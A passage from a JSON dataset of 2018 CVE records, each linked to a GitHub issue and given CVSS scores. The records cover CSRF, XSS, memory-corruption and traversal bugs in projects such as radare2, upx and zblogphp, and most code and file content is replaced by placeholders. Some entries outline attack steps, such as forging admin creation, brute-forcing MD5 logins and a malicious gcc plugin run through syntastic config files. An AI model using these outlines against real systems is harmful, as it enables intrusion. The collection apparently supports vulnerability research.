  19176. },
  19177. {
  19178. "CVE_ID": "CVE-2018-11126",
  19179. "Issue_Url_old": "https://github.com/doorgets/CMS/issues/11",
  19180. "Issue_Url_new": "https://github.com/doorgets/cms/issues/11",
  19181. "Repo_new": "doorgets/cms",
  19182. "Issue_Created_At": "2018-05-15T04:50:40Z",
  19183. "description": "There is a CSRF vulnerability that can be added to the administrator's password.. Although there are token fields, this field does not prevent CSRF attacks. poc\uff1a FILETAG When the victim accesses the malicious constructed link. FILETAG Successfully added an administrator user and tried to log in. FILETAG",
  19184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19185. "severity": "HIGH",
  19186. "baseScore": 8.8,
  19187. "impactScore": 5.9,
  19188. "exploitabilityScore": 2.8
  19189. },
  19190. {
  19191. "CVE_ID": "CVE-2018-11127",
  19192. "Issue_Url_old": "https://github.com/e107inc/e107/issues/3128",
  19193. "Issue_Url_new": "https://github.com/e107inc/e107/issues/3128",
  19194. "Repo_new": "e107inc/e107",
  19195. "Issue_Created_At": "2018-05-15T09:29:00Z",
  19196. "description": "There are CSRF vulnerabilities in the background, which can lead to arbitrary user deletion.. The Token is not validated in the background user deletion place. Causes the user to be deleted according to the id number. FILETAG After clicking delete, it will be deleted again. Grab packet analysis at this point. FILETAG The token field is not detected by analysis. Delete it directly. FILETAG After the token is removed, the request is constructed based on the user id of the annotation. FILETAG After the temptation administrator clicks, the user who finds the id is deleted. FILETAG POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG var f = APITAG APITAG APITAG APITAG",
  19197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  19198. "severity": "MEDIUM",
  19199. "baseScore": 6.5,
  19200. "impactScore": 3.6,
  19201. "exploitabilityScore": 2.8
  19202. },
  19203. {
  19204. "CVE_ID": "CVE-2018-11208",
  19205. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/187",
  19206. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/187",
  19207. "Repo_new": "zblogcn/zblogphp",
  19208. "Issue_Created_At": "2018-05-16T06:35:30Z",
  19209. "description": "There is a cross site scripting vulnerability. A xss vulnerability was discovered in newest zblogphp. There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML in background web site settings\uff1a POC\uff1a In the copyright information office\uff0cinsert ERRORTAG FILETAG Then access the website home page to trigger the vulnerability\uff1a FILETAG",
  19210. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  19211. "severity": "MEDIUM",
  19212. "baseScore": 4.8,
  19213. "impactScore": 2.7,
  19214. "exploitabilityScore": 1.7
  19215. },
  19216. {
  19217. "CVE_ID": "CVE-2018-11209",
  19218. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/188",
  19219. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/188",
  19220. "Repo_new": "zblogcn/zblogphp",
  19221. "Issue_Created_At": "2018-05-16T07:38:02Z",
  19222. "description": "Weak encryption\uff08MD5\uff09 leads to backstage violent cracking. A simple MD5 encryption is used in Z APITAG NUMBERTAG s backstage login page,and it uses single element authentication\uff0cresulting in a violent break into the backstage. POC: Backstage login page\uff1a FILETAG Grab data packets to get fields\uff0c APITAG FILETAG Then load a dictionary for violent cracking\uff1a FILETAG Access into the backstage of the website\uff1a FILETAG",
  19223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  19224. "severity": "HIGH",
  19225. "baseScore": 7.2,
  19226. "impactScore": 5.9,
  19227. "exploitabilityScore": 1.2
  19228. },
  19229. {
  19230. "CVE_ID": "CVE-2018-11210",
  19231. "Issue_Url_old": "https://github.com/leethomason/tinyxml2/issues/675",
  19232. "Issue_Url_new": "https://github.com/leethomason/tinyxml2/issues/675",
  19233. "Repo_new": "leethomason/tinyxml2",
  19234. "Issue_Created_At": "2018-05-16T02:05:16Z",
  19235. "description": "heap buffer overflow Error In APITAG hello\uff01I use libfuzzer to test APITAG I meet heap buffer overflow Error.I think it is due to APITAG APITAG function APITAG lead to heap buffer overflow.",
  19236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19237. "severity": "CRITICAL",
  19238. "baseScore": 9.8,
  19239. "impactScore": 5.9,
  19240. "exploitabilityScore": 3.9
  19241. },
  19242. {
  19243. "CVE_ID": "CVE-2018-11218",
  19244. "Issue_Url_old": "https://github.com/antirez/redis/issues/5017",
  19245. "Issue_Url_new": "https://github.com/redis/redis/issues/5017",
  19246. "Repo_new": "redis/redis",
  19247. "Issue_Created_At": "2018-06-13T10:50:36Z",
  19248. "description": "Placeholder.",
  19249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19250. "severity": "CRITICAL",
  19251. "baseScore": 9.8,
  19252. "impactScore": 5.9,
  19253. "exploitabilityScore": 3.9
  19254. },
  19255. {
  19256. "CVE_ID": "CVE-2018-11225",
  19257. "Issue_Url_old": "https://github.com/libming/libming/issues/143",
  19258. "Issue_Url_new": "https://github.com/libming/libming/issues/143",
  19259. "Repo_new": "libming/libming",
  19260. "Issue_Created_At": "2018-05-16T21:17:43Z",
  19261. "description": "SEGV in dcputs in APITAG URLTAG URLTAG Program received signal SIGSEGV, Segmentation fault. strlen () at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG strlen () at PATHTAG NUMBERTAG cca4 in dcputs (s NUMBERTAG at APITAG NUMBERTAG bf in APITAG (n=<optimized out>, actions NUMBERTAG a NUMBERTAG maxn=<optimized out>) at APITAG NUMBERTAG in APITAG (indent NUMBERTAG actions NUMBERTAG a NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG c4f0, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG c4f0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG c NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Breakpoint NUMBERTAG dcputs (s NUMBERTAG APITAG { \") at APITAG NUMBERTAG int len=strlen(s); (gdb) l NUMBERTAG oid NUMBERTAG dcputs(const char s NUMBERTAG int len=strlen(s NUMBERTAG dcchkstr(len NUMBERTAG strcat(dcptr,s NUMBERTAG dcptr+=len NUMBERTAG strsize+=len;",
  19262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19263. "severity": "HIGH",
  19264. "baseScore": 8.8,
  19265. "impactScore": 5.9,
  19266. "exploitabilityScore": 2.8
  19267. },
  19268. {
  19269. "CVE_ID": "CVE-2018-11230",
  19270. "Issue_Url_old": "https://github.com/agl/jbig2enc/issues/61",
  19271. "Issue_Url_new": "https://github.com/agl/jbig2enc/issues/61",
  19272. "Repo_new": "agl/jbig2enc",
  19273. "Issue_Created_At": "2018-05-17T06:49:15Z",
  19274. "description": "Error heap use after free APITAG jbig2_add_page(jbig2ctx , Pix ). Hello,I use my company tools. I found jbig a crash.it is heap use after free APITAG jbig2_add_page(jbig2ctx , Pix ).I think it is due to APITAG when APITAG want to obtain the wdith of photo.",
  19275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19276. "severity": "HIGH",
  19277. "baseScore": 8.8,
  19278. "impactScore": 5.9,
  19279. "exploitabilityScore": 2.8
  19280. },
  19281. {
  19282. "CVE_ID": "CVE-2018-11243",
  19283. "Issue_Url_old": "https://github.com/upx/upx/issues/207",
  19284. "Issue_Url_new": "https://github.com/upx/upx/issues/207",
  19285. "Repo_new": "upx/upx",
  19286. "Issue_Created_At": "2018-05-18T06:06:08Z",
  19287. "description": "free invalid pointer in APITAG ./upx.out version up NUMBERTAG git d NUMBERTAG ec NUMBERTAG this is a bug in decompression (upx d or upx t) , it's more significant that bugs in compression. crash when try to free an invalid pointer , the mem.cpp detect invalid double free and throw an exception (SIGABRT) FILETAG NUMBERTAG dacce in APITAG (this NUMBERTAG fffffffd NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG fffffffd NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG fffffffd NUMBERTAG in_chrg=<optimized out>) at APITAG NUMBERTAG bc in APITAG (this=<optimized out>, fo=<optimized out>) at APITAG when an attacker could make a fake chunk in that pointer , it caused a double free vulnerability and attacker is able to make a code execution.",
  19288. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19289. "severity": "HIGH",
  19290. "baseScore": 7.8,
  19291. "impactScore": 5.9,
  19292. "exploitabilityScore": 1.8
  19293. },
  19294. {
  19295. "CVE_ID": "CVE-2018-11243",
  19296. "Issue_Url_old": "https://github.com/upx/upx/issues/206",
  19297. "Issue_Url_new": "https://github.com/upx/upx/issues/206",
  19298. "Repo_new": "upx/upx",
  19299. "Issue_Created_At": "2018-05-17T18:06:14Z",
  19300. "description": "multiple memory reading issue. ./upx.out version up NUMBERTAG git NUMBERTAG c NUMBERTAG fb7d7b+ this time is the devel branch , everything up to date FILETAG the call stack for POC NUMBERTAG f8 in get_le NUMBERTAG p NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG b NUMBERTAG c0 APITAG , p NUMBERTAG at APITAG the FILETAG , contains POC1 & POC2 FILETAG",
  19301. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19302. "severity": "HIGH",
  19303. "baseScore": 7.8,
  19304. "impactScore": 5.9,
  19305. "exploitabilityScore": 1.8
  19306. },
  19307. {
  19308. "CVE_ID": "CVE-2018-11248",
  19309. "Issue_Url_old": "https://github.com/lingochamp/FileDownloader/issues/1028",
  19310. "Issue_Url_new": "https://github.com/lingochamp/filedownloader/issues/1028",
  19311. "Repo_new": "lingochamp/filedownloader",
  19312. "Issue_Created_At": "2018-05-17T11:01:52Z",
  19313. "description": "Directory Traversal Vulnerability in APITAG We have found a directory traversal vulnerability in APITAG which may cause remote code execution. For consideration of security, we do not reveal the detail of this vulnerability currently. Developers of this repo can contact me by Email: tiamo_inter foxmail.com",
  19314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19315. "severity": "CRITICAL",
  19316. "baseScore": 9.8,
  19317. "impactScore": 5.9,
  19318. "exploitabilityScore": 3.9
  19319. },
  19320. {
  19321. "CVE_ID": "CVE-2018-11251",
  19322. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/956",
  19323. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/956",
  19324. "Repo_new": "imagemagick/imagemagick",
  19325. "Issue_Created_At": "2018-01-24T02:10:17Z",
  19326. "description": "heap buffer overflow in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: magick buffer overflow APITAG /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
  19327. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19328. "severity": "MEDIUM",
  19329. "baseScore": 6.5,
  19330. "impactScore": 3.6,
  19331. "exploitabilityScore": 2.8
  19332. },
  19333. {
  19334. "CVE_ID": "CVE-2018-11319",
  19335. "Issue_Url_old": "https://github.com/vim-syntastic/syntastic/issues/2170",
  19336. "Issue_Url_new": "https://github.com/vim-syntastic/syntastic/issues/2170",
  19337. "Repo_new": "vim-syntastic/syntastic",
  19338. "Issue_Created_At": "2018-04-16T17:25:45Z",
  19339. "description": "Checker config files allow arbitrary code execution scenarios. Hi, I'm the Debian maintainer of vim syntastic and I received this bug report: CVETAG Package: vim syntastic Version NUMBERTAG Severity: serious Hello, syntastic has a Configuration Files NUMBERTAG feature enabled for several checkers, where: a configuration file is looked up in the directory of the file being checked, then upwards in parent directories. The search stops either when a file with the right name is found, or when the root of the filesystem is reached NUMBERTAG URLTAG Each line found in the configuration file is escaped as a single argument and appended to the checker command being run. I am not an expert on the various possibly dangerous command line options of all possible checkers, but I played with one I knew how to play with, and what follows is a possible attack. There might be easier attacks on checkers that are enabled by default, since the configuration files features, as it is now, leaves a pretty wide attack surface open. Step NUMBERTAG a malicious gcc plugin The source code: CODETAG Building the plugin: APITAG Installing the plugin as APITAG in /tmp: APITAG Step NUMBERTAG a syntastic config file APITAG Step NUMBERTAG enable the avrgcc plugin APITAG Step NUMBERTAG edit a C++ file in /tmp APITAG Step NUMBERTAG cry APITAG What should be different There are several steps that can avoid this NUMBERTAG allow to disable this feature, and ship with this feature disabled by default NUMBERTAG stop recursing upwards when hitting a directory that's writable by someone other than the current user NUMBERTAG check that the config files are owned by the current user Mitigation I am not a vimscript expert, and unfortunately I have not found a way to disable this behaviour without editing the syntastic config files. It works. What do you think about it?",
  19340. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  19341. "severity": "HIGH",
  19342. "baseScore": 7.5,
  19343. "impactScore": 5.9,
  19344. "exploitabilityScore": 1.6
  19345. },
  19346. {
  19347. "CVE_ID": "CVE-2018-11320",
  19348. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4578",
  19349. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4578",
  19350. "Repo_new": "octopusdeploy/issues",
  19351. "Issue_Created_At": "2018-05-21T05:32:37Z",
  19352. "description": "Sensitive variables contributed via machine during deployment are not obfuscated in the deployment logs. When an Azure Target is involved in a deployment, the sensitive account variables linked to it are not obfuscated in the logs. Steps to reproduce Create an Azure Subscription account Create an Azure APITAG target that uses the previously created account Create a project with a Deploy Azure APITAG step that uses the same role as the previously created target. Add the debugging variable APITAG to the project. Create and deploy release View the deployment log What you expect to see The printed log should show APITAG as the value of the variable APITAG What you see instead The actual value of the azure password is printed to the logs Octopus releases with this regression bug This issue came about with a changed execution pipeline which was available from APITAG however this code path that led to this bug would not have been commonly executed until the Azure targets introduced in APITAG CVE NUMBERTAG",
  19353. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19354. "severity": "CRITICAL",
  19355. "baseScore": 9.8,
  19356. "impactScore": 5.9,
  19357. "exploitabilityScore": 3.9
  19358. },
  19359. {
  19360. "CVE_ID": "CVE-2018-11330",
  19361. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/58",
  19362. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/58",
  19363. "Repo_new": "pluck-cms/pluck",
  19364. "Issue_Created_At": "2018-05-19T01:50:38Z",
  19365. "description": "Xss & file upload vuln. Please advise. .",
  19366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  19367. "severity": "MEDIUM",
  19368. "baseScore": 4.8,
  19369. "impactScore": 2.7,
  19370. "exploitabilityScore": 1.7
  19371. },
  19372. {
  19373. "CVE_ID": "CVE-2018-11332",
  19374. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/483",
  19375. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/483",
  19376. "Repo_new": "clippercms/clippercms",
  19377. "Issue_Created_At": "2018-05-22T12:33:20Z",
  19378. "description": "Persistent XSS on APITAG name' field (site_name). A persistent (stored) XSS can be exploited because site_name isn't being sanitized upon saving. This vulnerability is specifically the APITAG Name\" field under the Configuration APITAG tab. Here's an output when the payload APITAG alert NUMBERTAG APITAG is entered and saved. Upon saving through the field: FILETAG Upon visiting the login page: FILETAG Please refer here for a fix: URLTAG",
  19379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  19380. "severity": "MEDIUM",
  19381. "baseScore": 4.8,
  19382. "impactScore": 2.7,
  19383. "exploitabilityScore": 1.7
  19384. },
  19385. {
  19386. "CVE_ID": "CVE-2018-11339",
  19387. "Issue_Url_old": "https://github.com/frappe/frappe/issues/5546",
  19388. "Issue_Url_new": "https://github.com/frappe/frappe/issues/5546",
  19389. "Repo_new": "frappe/frappe",
  19390. "Issue_Created_At": "2018-05-10T15:30:41Z",
  19391. "description": "XSS Vulnerability in comment area. URLTAG",
  19392. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19393. "severity": "MEDIUM",
  19394. "baseScore": 6.1,
  19395. "impactScore": 2.7,
  19396. "exploitabilityScore": 2.8
  19397. },
  19398. {
  19399. "CVE_ID": "CVE-2018-11371",
  19400. "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/9",
  19401. "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/9",
  19402. "Repo_new": "zorlan/skycaiji",
  19403. "Issue_Created_At": "2018-05-22T10:13:44Z",
  19404. "description": "\u540e\u53f0\u6dfb\u52a0\u7528\u6237CSRF\u6f0f\u6d1e. \u63cf\u8ff0\uff1a APITAG \u6f0f\u6d1e\u7c7b\u578b\uff1a CSRF \u653b\u51fb\u8f7d\u4f53\uff1a FILETAG CODETAG APITAG \u653b\u51fb\u5f71\u54cd\uff1a \u653b\u51fb\u8005\u8bbf\u95ee\u6b64\u9875\u9762\u5373\u53ef\u6dfb\u52a0\u7f51\u7ad9\u7ba1\u7406\u5458\u8d26\u53f7",
  19405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19406. "severity": "HIGH",
  19407. "baseScore": 8.8,
  19408. "impactScore": 5.9,
  19409. "exploitabilityScore": 2.8
  19410. },
  19411. {
  19412. "CVE_ID": "CVE-2018-11375",
  19413. "Issue_Url_old": "https://github.com/radare/radare2/issues/9928",
  19414. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9928",
  19415. "Repo_new": "radareorg/radare2",
  19416. "Issue_Created_At": "2018-04-19T12:52:01Z",
  19417. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic (binary file) | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) |radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG dfca commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19418. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19419. "severity": "MEDIUM",
  19420. "baseScore": 5.5,
  19421. "impactScore": 3.6,
  19422. "exploitabilityScore": 1.8
  19423. },
  19424. {
  19425. "CVE_ID": "CVE-2018-11376",
  19426. "Issue_Url_old": "https://github.com/radare/radare2/issues/9904",
  19427. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9904",
  19428. "Repo_new": "radareorg/radare2",
  19429. "Issue_Created_At": "2018-04-16T19:06:05Z",
  19430. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run `r2 A r2_hoobr_r_read_le NUMBERTAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19431. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19432. "severity": "MEDIUM",
  19433. "baseScore": 5.5,
  19434. "impactScore": 3.6,
  19435. "exploitabilityScore": 1.8
  19436. },
  19437. {
  19438. "CVE_ID": "CVE-2018-11377",
  19439. "Issue_Url_old": "https://github.com/radare/radare2/issues/9901",
  19440. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9901",
  19441. "Repo_new": "radareorg/radare2",
  19442. "Issue_Created_At": "2018-04-16T12:30:04Z",
  19443. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19444. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19445. "severity": "MEDIUM",
  19446. "baseScore": 5.5,
  19447. "impactScore": 3.6,
  19448. "exploitabilityScore": 1.8
  19449. },
  19450. {
  19451. "CVE_ID": "CVE-2018-11378",
  19452. "Issue_Url_old": "https://github.com/radare/radare2/issues/9969",
  19453. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9969",
  19454. "Repo_new": "radareorg/radare2",
  19455. "Issue_Created_At": "2018-04-27T11:06:14Z",
  19456. "description": "Stack buffer overflow in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Binary (generic) | Architecture/bits of the file (mandatory) | WASM | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f commit: APITAG build NUMBERTAG Expected behavior Dissasembly of file or error message. Actual behavior Stack buffer overflow in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19457. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19458. "severity": "HIGH",
  19459. "baseScore": 7.8,
  19460. "impactScore": 5.9,
  19461. "exploitabilityScore": 1.8
  19462. },
  19463. {
  19464. "CVE_ID": "CVE-2018-11379",
  19465. "Issue_Url_old": "https://github.com/radare/radare2/issues/9926",
  19466. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9926",
  19467. "Repo_new": "radareorg/radare2",
  19468. "Issue_Created_At": "2018-04-19T08:52:37Z",
  19469. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) |radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG dfca commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19470. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19471. "severity": "MEDIUM",
  19472. "baseScore": 5.5,
  19473. "impactScore": 3.6,
  19474. "exploitabilityScore": 1.8
  19475. },
  19476. {
  19477. "CVE_ID": "CVE-2018-11380",
  19478. "Issue_Url_old": "https://github.com/radare/radare2/issues/9970",
  19479. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9970",
  19480. "Repo_new": "radareorg/radare2",
  19481. "Issue_Created_At": "2018-04-27T11:08:26Z",
  19482. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Mach O | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f commit: APITAG build NUMBERTAG Expected behavior Dissasembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19483. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19484. "severity": "MEDIUM",
  19485. "baseScore": 5.5,
  19486. "impactScore": 3.6,
  19487. "exploitabilityScore": 1.8
  19488. },
  19489. {
  19490. "CVE_ID": "CVE-2018-11381",
  19491. "Issue_Url_old": "https://github.com/radare/radare2/issues/9902",
  19492. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9902",
  19493. "Repo_new": "radareorg/radare2",
  19494. "Issue_Created_At": "2018-04-16T12:33:32Z",
  19495. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic | Architecture/bits of the file (mandatory) | None APITAG file) | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19496. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19497. "severity": "MEDIUM",
  19498. "baseScore": 5.5,
  19499. "impactScore": 3.6,
  19500. "exploitabilityScore": 1.8
  19501. },
  19502. {
  19503. "CVE_ID": "CVE-2018-11382",
  19504. "Issue_Url_old": "https://github.com/radare/radare2/issues/10091",
  19505. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10091",
  19506. "Repo_new": "radareorg/radare2",
  19507. "Issue_Created_At": "2018-05-14T12:44:21Z",
  19508. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Binary | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG d2b NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  19509. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19510. "severity": "MEDIUM",
  19511. "baseScore": 5.5,
  19512. "impactScore": 3.6,
  19513. "exploitabilityScore": 1.8
  19514. },
  19515. {
  19516. "CVE_ID": "CVE-2018-11383",
  19517. "Issue_Url_old": "https://github.com/radare/radare2/issues/9943",
  19518. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9943",
  19519. "Repo_new": "radareorg/radare2",
  19520. "Issue_Created_At": "2018-04-23T10:56:15Z",
  19521. "description": "Invalid free in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g4f NUMBERTAG f9c commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Invaild free and program crash. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... Backtrace & error message: ERRORTAG Extract from Valgrind log: CODETAG",
  19522. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19523. "severity": "MEDIUM",
  19524. "baseScore": 5.5,
  19525. "impactScore": 3.6,
  19526. "exploitabilityScore": 1.8
  19527. },
  19528. {
  19529. "CVE_ID": "CVE-2018-11384",
  19530. "Issue_Url_old": "https://github.com/radare/radare2/issues/9903",
  19531. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9903",
  19532. "Repo_new": "radareorg/radare2",
